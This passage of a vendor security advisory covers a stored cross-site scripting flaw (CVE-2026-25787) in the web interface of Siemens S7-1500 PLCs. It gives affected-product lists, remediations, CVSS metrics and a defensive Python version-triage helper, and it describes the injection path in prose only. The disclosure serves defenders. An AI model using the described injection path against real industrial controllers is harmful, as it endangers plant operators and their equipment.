S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0), SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0), SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0), SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN00-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN00-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0), SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0), SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0), SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0), SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0), SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0), SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0), SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0), SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0), SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0), SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0), SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0), SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0), SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0), SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0), SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0), SIMATIC S7-1500 
CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0), SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0), SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0), SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0), SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0), SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0), SIMATIC S7-1500 Software Controller CPU 1507S F V2, SIMATIC S7-1500 Software Controller CPU 1507S F V3, SIMATIC S7-1500 Software Controller CPU 1507S F V4, SIMATIC S7-1500 Software Controller CPU 1507S V2, SIMATIC S7-1500 Software Controller CPU 1507S V3, SIMATIC S7-1500 Software Controller CPU 1507S V4, SIMATIC S7-1500 Software Controller CPU 1508S F V2, SIMATIC S7-1500 Software Controller CPU 1508S F V3, SIMATIC S7-1500 Software Controller CPU 1508S F V4, SIMATIC S7-1500 Software Controller CPU 1508S T V3, SIMATIC S7-1500 Software Controller CPU 1508S TF V3, SIMATIC S7-1500 Software Controller CPU 1508S V2, SIMATIC S7-1500 Software Controller CPU 1508S V3, SIMATIC S7-1500 Software Controller CPU 1508S V4, SIMATIC S7-1500 Software Controller Linux V2, SIMATIC S7-1500 Software Controller Linux V3, SIMATIC S7-PLCSIM Advanced, SIPLUS ET 200SP CPU 1510SP F-1 PN (6AG1510-1SJ01-2AB0), SIPLUS ET 200SP CPU 1510SP F-1 PN RAIL (6AG2510-1SJ01-1AB0), SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-2AB0), SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-7AB0), SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-1AB0), SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-4AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK00-2AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-2AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-7AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL (6AG2512-1SK01-1AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL 
(6AG2512-1SK01-4AB0), SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-2AB0), SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-7AB0), SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-1AB0), SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-4AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK00-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-7AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-7AB0), SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK01-1AB0), SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK02-1AB0), SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK01-4AB0), SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK02-4AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK00-2AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK01-2AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK02-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL00-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-7AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-7AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL00-2AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL01-2AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL02-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM01-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM02-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN RAIL (6AG2515-2FM02-4AB0), SIPLUS S7-1500 CPU 1515F-2 PN T2 RAIL (6AG2515-2FM01-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP RAIL (6AG2516-3AN02-4AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP TX RAIL (6AG2516-3AN01-4AB0), SIPLUS S7-1500 CPU 1516F-3 
PN/DP (6AG1516-3FN00-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN01-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN02-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-4AB0), SIPLUS S7-1500 CPU 1518-4 PN/DP (6AG1518-4AP00-4AB0), SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0), SIPLUS S7-1500 CPU 1518F-4 PN/DP (6AG1518-4FP00-4AB0)
Product Status: known_affected

Remediations
Mitigation: Restrict TIA project download to trusted personnel only.
No fix planned: Currently no fix is planned.
None available: Currently no fix is available.
Vendor fix: Update to V2.9.9 or later version. https://support.industry.siemens.com/cs/ww/en/view/109478459/
Vendor fix: Update to V3.1.6 or later version. https://support.industry.siemens.com/cs/ww/en/view/109773914/
Vendor fix: Update to V3.1.6 or later version. https://support.industry.siemens.com/cs/ww/en/view/109478459/

Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Metrics
CVSS Version: 3.1
Base Score: 9.1
Base Severity: CRITICAL
Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2026-25787
Affected devices do not properly validate and sanitize the Technology Object (TO) name rendered on the "Motion Control Diagnostics" page of the web interface. This could allow an authenticated attacker who is authorized to download a TIA project into the product to inject malicious scripts into the page. If a benign user with appropriate rights accesses the "Motion Control Diagnostics" parameters page, the malicious code would be executed in the scope of their web session.
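The affected-product entries above use the vers: range notation (vers:intdot/<2.9.9, vers:all/*) and the vendor fixes line up with each range's upper bound. As an added example, not Siemens or CISA tooling, the following Python parses a few constructed entries in that flattened form, checks an installed firmware version against the range, and reads the update target off the range; ADVISORY_SAMPLE and the triage() helper are this example's own.

```python
"""Triage helper for flattened "PRODUCT (MLFB) vers:SCHEME/RANGE (CVEs)" entries.
Added example, not Siemens or CISA tooling."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: four entries copied in the advisory's flattened form.
ADVISORY_SAMPLE = (
    "SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0) vers:intdot/<2.9.9 "
    "(CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) "
    "SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0) vers:all/* "
    "(CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) "
    "SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0) vers:intdot/<3.1.6 "
    "(CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) "
    "SIMATIC S7-1500 Software Controller CPU 1507S V3 vers:all/* "
    "(CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)"
)

# One entry: product name, optional "(MLFB)", a vers: range, then a CVE list.
ENTRY_RE = re.compile(
    r"(?P<name>.+?)\s+vers:(?P<scheme>[a-z]+)/(?P<range>\S+)\s+\((?P<cves>CVE-[^)]*)\)"
)
# Siemens order numbers (MLFB) look like 6ES7511-1AK01-0AB0 or 6AG1510-1SJ01-2AB0.
MLFB_RE = re.compile(r"\((?P<mlfb>6[A-Z]{2}\d[A-Z0-9-]+)\)\s*$")
CONSTRAINT_RE = re.compile(r"^(?P<op>>=|<=|!=|<|>|=)(?P<ver>.+)$")


@dataclass(frozen=True)
class AffectedEntry:
    product: str
    mlfb: Optional[str]
    scheme: str           # "intdot" or "all" on this page
    version_range: str    # "<2.9.9", "<3.1.6" or "*"
    cves: tuple


def parse_entries(text):
    """Split the flattened advisory list into structured entries."""
    entries = []
    for m in ENTRY_RE.finditer(text):
        name = m.group("name").strip()
        mlfb_match = MLFB_RE.search(name)
        mlfb = mlfb_match.group("mlfb") if mlfb_match else None
        cves = tuple(c.strip() for c in m.group("cves").split(","))
        entries.append(AffectedEntry(name, mlfb, m.group("scheme"), m.group("range"), cves))
    return entries


def parse_version(text):
    """'V2.9.5' -> (2, 9, 5): dotted integers, as the intdot scheme requires."""
    return tuple(int(part) for part in text.strip().lstrip("Vv").split("."))


def _cmp(a, b):
    # Pad to equal length so that 2.9 compares equal to 2.9.0.
    width = max(len(a), len(b))
    a, b = a + (0,) * (width - len(a)), b + (0,) * (width - len(b))
    return (a > b) - (a < b)


def in_range(version_range, installed):
    """True if the installed firmware falls inside a vers: range.

    Supports '*' (every version) and a single comparator constraint, which is
    all this advisory uses; multi-constraint ranges ('|') raise ValueError.
    """
    if version_range == "*":
        return True
    if "|" in version_range:
        raise ValueError("multi-constraint vers ranges are not supported here")
    m = CONSTRAINT_RE.match(version_range)
    if not m:
        raise ValueError("unrecognised vers range: %r" % version_range)
    c = _cmp(parse_version(installed), parse_version(m.group("ver")))
    return {"<": c < 0, "<=": c <= 0, ">": c > 0, ">=": c >= 0,
            "=": c == 0, "!=": c != 0}[m.group("op")]


def fix_version(version_range):
    """For a '<X' range, X is the version the advisory says to update to; '*' has none."""
    if version_range.startswith("<") and not version_range.startswith("<="):
        return version_range[1:]
    return None


def triage(entries, installed, mlfb=None, product=None):
    """(affected, fix_version, cves) for one device, matched by MLFB or product name."""
    for e in entries:
        if (mlfb and e.mlfb == mlfb) or (product and e.product == product):
            return in_range(e.version_range, installed), fix_version(e.version_range), e.cves
    return False, None, ()


if __name__ == "__main__":
    entries = parse_entries(ADVISORY_SAMPLE)
    print(triage(entries, "V2.9.5", mlfb="6ES7511-1AK01-0AB0"))
    print(triage(entries, "V3.0.1", product="SIMATIC S7-1500 Software Controller CPU 1507S V3"))
```

A device whose range is vers:all/* comes back affected with no fix version, which is where the advisory's mitigation (restrict TIA project download) is the only available control.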
Affected Products
Siemens SIMATIC S7 PLC Web Server
Vendor: Siemens
Product Version: SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0), SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ00-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ00-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK00-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK00-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0), SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0), SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0), SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0), SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0), SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs, SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl.
SIPLUS variants) V3 CPUs, SIMATIC ET 200SP Open Controller CPU 1515SP PC3 V4 CPUs, SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK00-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0), SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0), SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0), SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0), SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL00-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL00-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0), SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0), SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM00-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM00-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0), SIMATIC 
S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0), SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0), SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0), SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN00-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN00-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0), SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0), SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0), SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0), SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0), SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0), SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0), SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0), SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0), SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0), SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0), SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0), SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0), SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0), SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0), SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0), SIMATIC S7-1500 
CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0), SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0), SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0), SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0), SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0), SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0), SIMATIC S7-1500 Software Controller CPU 1507S F V2, SIMATIC S7-1500 Software Controller CPU 1507S F V3, SIMATIC S7-1500 Software Controller CPU 1507S F V4, SIMATIC S7-1500 Software Controller CPU 1507S V2, SIMATIC S7-1500 Software Controller CPU 1507S V3, SIMATIC S7-1500 Software Controller CPU 1507S V4, SIMATIC S7-1500 Software Controller CPU 1508S F V2, SIMATIC S7-1500 Software Controller CPU 1508S F V3, SIMATIC S7-1500 Software Controller CPU 1508S F V4, SIMATIC S7-1500 Software Controller CPU 1508S T V3, SIMATIC S7-1500 Software Controller CPU 1508S TF V3, SIMATIC S7-1500 Software Controller CPU 1508S V2, SIMATIC S7-1500 Software Controller CPU 1508S V3, SIMATIC S7-1500 Software Controller CPU 1508S V4, SIMATIC S7-1500 Software Controller Linux V2, SIMATIC S7-1500 Software Controller Linux V3, SIMATIC S7-PLCSIM Advanced, SIPLUS ET 200SP CPU 1510SP F-1 PN (6AG1510-1SJ01-2AB0), SIPLUS ET 200SP CPU 1510SP F-1 PN RAIL (6AG2510-1SJ01-1AB0), SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-2AB0), SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-7AB0), SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-1AB0), SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-4AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK00-2AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-2AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-7AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL (6AG2512-1SK01-1AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL 
(6AG2512-1SK01-4AB0), SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-2AB0), SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-7AB0), SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-1AB0), SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-4AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK00-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-7AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-7AB0), SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK01-1AB0), SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK02-1AB0), SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK01-4AB0), SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK02-4AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK00-2AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK01-2AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK02-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL00-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-7AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-7AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL00-2AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL01-2AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL02-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM01-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM02-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN RAIL (6AG2515-2FM02-4AB0), SIPLUS S7-1500 CPU 1515F-2 PN T2 RAIL (6AG2515-2FM01-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP RAIL (6AG2516-3AN02-4AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP TX RAIL (6AG2516-3AN01-4AB0), SIPLUS S7-1500 CPU 1516F-3 
PN/DP (6AG1516-3FN00-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN01-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN02-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-4AB0), SIPLUS S7-1500 CPU 1518-4 PN/DP (6AG1518-4AP00-4AB0), SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0), SIPLUS S7-1500 CPU 1518F-4 PN/DP (6AG1518-4FP00-4AB0)
Product Status: known_affected
Remediations
Mitigation: Restrict TIA project download to trusted personnel only.
No fix planned: Currently no fix is planned
None available: Currently no fix is available
Vendor fix: Update to V2.9.9 or later version https://support.industry.siemens.com/cs/ww/en/view/109478459/
Vendor fix: Update to V3.1.6 or later version https://support.industry.siemens.com/cs/ww/en/view/109773914/
Vendor fix: Update to V3.1.6 or later version https://support.industry.siemens.com/cs/ww/en/view/109478459/
Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Metrics
CVSS Version: 3.1
Base Score: 9.1
Base Severity: CRITICAL
